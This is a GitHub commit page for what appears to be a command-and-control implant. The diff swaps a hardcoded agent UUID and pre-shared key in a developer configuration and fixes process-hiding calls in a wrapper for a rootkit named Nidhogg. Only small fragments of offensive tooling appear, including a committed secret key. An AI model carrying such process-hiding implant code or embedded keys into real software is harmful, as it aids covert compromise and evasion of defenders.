Skip to content

Commit

Permalink
update nidhogg api version
Browse files Browse the repository at this point in the history
  • Loading branch information
checkymander committed Apr 25, 2024
1 parent 4510cc6 commit be6b318
Show file tree
Hide file tree
Showing 2 changed files with 4 additions and 4 deletions.
Original file line number Diff line number Diff line change
Expand Up @@ -52,8 +52,8 @@ public AgentConfig()
#if CHECKYMANDERDEV
sleep = 1;
jitter = 1;
uuid = "ac6dbd79-0c92-444a-9b64-5ab69d524bee";
psk = "7xhCFasVFkApf4CxFWkiXIqlpBroxPQDO/QfL/WHyxY=";
uuid = "3344f195-a896-445a-8671-925730089cd3";
psk = "6utXo5oLLi9EpE5YaHiSP446RahDz1Gu6WJzo3pyz44=";
killDate = DateTime.Now.AddYears(1);
#else
uuid = "%UUID%";
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -44,12 +44,12 @@ public NidhoggErrorCodes ProcessUnprotect(uint pid)

public NidhoggErrorCodes ProcessHide(uint pid)
{
return ProcessProtection(pid, true);
return ProcessHiding(pid, true);
}

public NidhoggErrorCodes ProcessUnhide(uint pid)
{
return ProcessProtection(pid, false);
return ProcessHiding(pid, false);
}

public NidhoggErrorCodes ProcessClearAllProtection()
Expand Down

0 comments on commit be6b318

Please sign in to comment.